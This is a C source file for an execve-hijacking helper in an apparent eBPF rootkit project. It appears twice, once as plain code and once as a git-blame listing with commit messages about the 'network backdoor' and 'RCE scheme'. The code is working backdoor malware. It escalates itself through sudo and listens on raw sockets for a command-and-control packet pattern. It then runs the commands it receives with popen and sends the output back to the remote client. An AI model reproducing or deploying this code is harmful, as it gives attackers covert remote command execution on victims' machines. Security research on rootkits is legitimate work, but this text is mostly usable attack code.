src/helpers/execve_hijack.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <sys/wait.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <dlfcn.h>
#include <sys/timerfd.h>

#include "lib/RawTCP.h"
#include "../common/c&c.h"


int test_time_values_injection(){

    struct itimerspec new_value;
    int max_exp, fd;
    struct timespec now;
    uint64_t exp, tot_exp;
    ssize_t s;


    fd = timerfd_create(CLOCK_REALTIME, 0);
    if (fd == -1)
        return -1;

    new_value.it_interval.tv_sec = 30;
    new_value.it_interval.tv_nsec = 0;

    if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)
        return -1;
    
        
    printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);

    return 0;
}


char* execute_command(char* command){

    FILE *fp;
    char* res = calloc(4096, sizeof(char));
    char buf[1024];

    fp = popen(command, "r");
    if(fp == NULL) {
        printf("Failed to run command\n" );
        return "COMMAND ERROR";
    }

    while(fgets(buf, sizeof(buf), fp) != NULL) {
        strcat(res, buf);
    }
    printf("RESULT OF COMMAND: %s\n", res);

    pclose(fp);
    return res;
}


char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
    struct hostent *host_entry;
    int hostname;
  
    hostname = gethostname(hostbuffer, sizeof(hostbuffer));
    if(hostname==-1){
        exit(1);
    }
  
    host_entry = gethostbyname(hostbuffer);
    if(host_entry == NULL){
        exit(1);
    }
  
    // To convert an Internet network
    // address into ASCII string
    strcpy(IPbuffer,inet_ntoa(*((struct in_addr*) host_entry->h_addr_list[0])));
  
    return IPbuffer;
}

int main(int argc, char* argv[], char *envp[]){
    printf("Hello world from execve hijacker\n");
    for(int ii=0; ii<argc; ii++){
        printf("Argument %i is %s\n", ii, argv[ii]);
    }
    
    test_time_values_injection();

    time_t rawtime;
    struct tm * timeinfo;

    time ( &rawtime );
    timeinfo = localtime ( &rawtime );
    char* timestr = asctime(timeinfo);


    if(geteuid() != 0){
        //We do not have privileges, but we do want them. Let's rerun the program now.
        char* args[argc+1]; 
        args[0] = argv[0];
        for(int ii=0; ii<argc; ii++){
            args[ii+1] = argv[ii];
        }
        if(execve("/usr/bin/sudo", args, envp)<0){
            perror("Failed to execve()");
            exit(-1);
        }
    }


    //We proceed to fork() and exec the original program, whilst also executing the one we 
    //ordered to execute via the network backdoor
    //int bpf_map_fd = bpf_map_get_fd_by_id()

    int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
    if(fd<0){
        perror("Failed to open log file");
        //return -1;
    }

    int ii = 0;
    while(*(timestr+ii)!='\0'){
        write(fd, timestr+ii, 1);
        ii++;
    }
    write(fd, "\t", 1);
    
    ii = 0;
    while(*(argv[0]+ii)!='\0'){
        write(fd, argv[0]+ii, 1);
        ii++;
    }

    write(fd, "\n", 1);
    write(fd, "Sniffing...\n", 13);
    

    packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
    if(packet.ipheader == NULL){
        write(fd, "Failed to open rawsocket\n", 1);
        return -1;
    }
    write(fd, "Sniffed\n", 9);
    //TODO GET THE IP FROM THE BACKDOOR CLIENT
    char* local_ip = getLocalIpAddress();
    char remote_ip[16];
    inet_ntop(AF_INET, &(packet.ipheader->saddr), remote_ip, 16);
    printf("IP: %s\n", local_ip);
    
    packet_t packet_ack = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_ACK);
    if(rawsocket_send(packet_ack)<0){
        write(fd, "Failed to open rawsocket\n", 1);
        close(fd);
        return -1;
    }

    //Start of pseudo connection with the rootkit client
    int connection_close = 0;
    while(!connection_close){
        packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG);
        printf("Received client message\n");
        char* payload = packet.payload;
        char *p;
        p = strtok(payload, "#");
        p = strtok(NULL, "#");
        if(p){
            if(strcmp(p, CC_PROT_FIN_PART)==0){
                printf("Connection closed by request\n");
                connection_close = 1;
            }else{
                printf("Received request: %s\n", p);
                char* res = execute_command(p);
                char* payload_buf = calloc(4096, sizeof(char));
                strcpy(payload_buf, CC_PROT_MSG);
                strcat(payload_buf, res);
                packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf);
                if(rawsocket_send(packet_res)<0){
                    write(fd, "Failed to open rawsocket\n", 1);
                    close(fd);
                    return -1;
                }
                free(payload_buf);
                free(res);
            }
        }
    }

    close(fd);
    return 0;
}
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`#include <stdio.h>`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`#include <stdlib.h>`
			`#include <sys/types.h>`
			`#include <sys/stat.h>`
			`#include <fcntl.h>`
			`#include <unistd.h>`
Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`#include <time.h>`
Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor 2022-02-14 20:08:30 -05:00			`#include <sys/wait.h>`
			`#include <bpf/bpf.h>`
			`#include <bpf/libbpf.h>`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`#include <sys/socket.h>`
			`#include <netinet/in.h>`
			`#include <arpa/inet.h>`
			`#include <sys/socket.h>`
			`#include <netdb.h>`
			`#include <netinet/ip.h>`
			`#include <netinet/tcp.h>`
Added new libc symbols extraction 2022-03-02 19:00:50 -05:00			`#include <dlfcn.h>`
Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00			`#include <sys/timerfd.h>`
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`#include "lib/RawTCP.h"`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`#include "../common/c&c.h"`

Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00
Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00			`int test_time_values_injection(){`

			`struct itimerspec new_value;`
			`int max_exp, fd;`
			`struct timespec now;`
			`uint64_t exp, tot_exp;`
			`ssize_t s;`
Finished extraction of stack return address 2022-03-17 13:18:19 -04:00

Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00			`fd = timerfd_create(CLOCK_REALTIME, 0);`
			`if (fd == -1)`
			`return -1;`

			`new_value.it_interval.tv_sec = 30;`
			`new_value.it_interval.tv_nsec = 0;`

			`if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)`
			`return -1;`
Finished extraction of stack return address 2022-03-17 13:18:19 -04:00
Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00
			`printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);`

			`return 0;`
			`}`


Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`char* execute_command(char* command){`
Added new libc symbols extraction 2022-03-02 19:00:50 -05:00
Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`FILE *fp;`
			`char* res = calloc(4096, sizeof(char));`
			`char buf[1024];`

			`fp = popen(command, "r");`
			`if(fp == NULL) {`
			`printf("Failed to run command\n" );`
			`return "COMMAND ERROR";`
			`}`

			`while(fgets(buf, sizeof(buf), fp) != NULL) {`
			`strcat(res, buf);`
			`}`
			`printf("RESULT OF COMMAND: %s\n", res);`

			`pclose(fp);`
			`return res;`
			`}`


Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`char* getLocalIpAddress(){`
			`char hostbuffer[256];`
			`char* IPbuffer = calloc(256, sizeof(char));`
			`struct hostent *host_entry;`
			`int hostname;`

			`hostname = gethostname(hostbuffer, sizeof(hostbuffer));`
			`if(hostname==-1){`
			`exit(1);`
			`}`

			`host_entry = gethostbyname(hostbuffer);`
			`if(host_entry == NULL){`
			`exit(1);`
			`}`

			`// To convert an Internet network`
			`// address into ASCII string`
			`strcpy(IPbuffer,inet_ntoa(((struct in_addr) host_entry->h_addr_list[0])));`

			`return IPbuffer;`
			`}`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00
Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper 2022-02-19 11:57:32 -05:00			`int main(int argc, char* argv[], char *envp[]){`
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`printf("Hello world from execve hijacker\n");`
Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper 2022-02-19 11:57:32 -05:00			`for(int ii=0; ii<argc; ii++){`
			`printf("Argument %i is %s\n", ii, argv[ii]);`
			`}`
Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack. 2022-03-03 05:53:51 -05:00
Added extraction of original jump instruction and opcodes 2022-03-15 18:36:59 -04:00			`test_time_values_injection();`

Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`time_t rawtime;`
			`struct tm * timeinfo;`

			`time ( &rawtime );`
			`timeinfo = localtime ( &rawtime );`
			`char* timestr = asctime(timeinfo);`

Corrected issues of opening directories without permission in execve helper 2022-02-24 19:53:11 -05:00
			`if(geteuid() != 0){`
			`//We do not have privileges, but we do want them. Let's rerun the program now.`
			`char* args[argc+1];`
			`args[0] = argv[0];`
			`for(int ii=0; ii<argc; ii++){`
			`args[ii+1] = argv[ii];`
			`}`
			`if(execve("/usr/bin/sudo", args, envp)<0){`
			`perror("Failed to execve()");`
			`exit(-1);`
			`}`
			`}`


Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor 2022-02-14 20:08:30 -05:00			`//We proceed to fork() and exec the original program, whilst also executing the one we`
			`//ordered to execute via the network backdoor`
			`//int bpf_map_fd = bpf_map_get_fd_by_id()`

Corrected issues of opening directories without permission in execve helper 2022-02-24 19:53:11 -05:00			`int fd = open("/tmp/rootlog", O_RDWR \| O_CREAT \| O_TRUNC, 0666);`
			`if(fd<0){`
			`perror("Failed to open log file");`
			`//return -1;`
			`}`

Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`int ii = 0;`
Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`while(*(timestr+ii)!='\0'){`
			`write(fd, timestr+ii, 1);`
			`ii++;`
			`}`
			`write(fd, "\t", 1);`

			`ii = 0;`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`while(*(argv[0]+ii)!='\0'){`
			`write(fd, argv[0]+ii, 1);`
			`ii++;`
			`}`

Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`write(fd, "\n", 1);`
Added new TC module, updates to the exec hooking system and the userland module 2022-02-20 16:50:15 -05:00			`write(fd, "Sniffing...\n", 13);`
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00
			`packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);`
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00			`if(packet.ipheader == NULL){`
			`write(fd, "Failed to open rawsocket\n", 1);`
			`return -1;`
			`}`
			`write(fd, "Sniffed\n", 9);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`//TODO GET THE IP FROM THE BACKDOOR CLIENT`
			`char* local_ip = getLocalIpAddress();`
			`char remote_ip[16];`
			`inet_ntop(AF_INET, &(packet.ipheader->saddr), remote_ip, 16);`
			`printf("IP: %s\n", local_ip);`

			`packet_t packet_ack = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_ACK);`
			`if(rawsocket_send(packet_ack)<0){`
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00			`write(fd, "Failed to open rawsocket\n", 1);`
			`close(fd);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`return -1;`
			`}`

			`//Start of pseudo connection with the rootkit client`
			`int connection_close = 0;`
			`while(!connection_close){`
			`packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG);`
			`printf("Received client message\n");`
			`char* payload = packet.payload;`
			`char *p;`
			`p = strtok(payload, "#");`
			`p = strtok(NULL, "#");`
			`if(p){`
			`if(strcmp(p, CC_PROT_FIN_PART)==0){`
			`printf("Connection closed by request\n");`
			`connection_close = 1;`
			`}else{`
			`printf("Received request: %s\n", p);`
Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`char* res = execute_command(p);`
			`char* payload_buf = calloc(4096, sizeof(char));`
Added new TC module, updates to the exec hooking system and the userland module 2022-02-20 16:50:15 -05:00			`strcpy(payload_buf, CC_PROT_MSG);`
Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`strcat(payload_buf, res);`
			`packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`if(rawsocket_send(packet_res)<0){`
Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00			`write(fd, "Failed to open rawsocket\n", 1);`
			`close(fd);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`return -1;`
			`}`
Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`free(payload_buf);`
			`free(res);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`}`
			`}`
			`}`

Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted 2022-02-18 09:08:54 -05:00			`close(fd);`
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`return 0;`
			`}`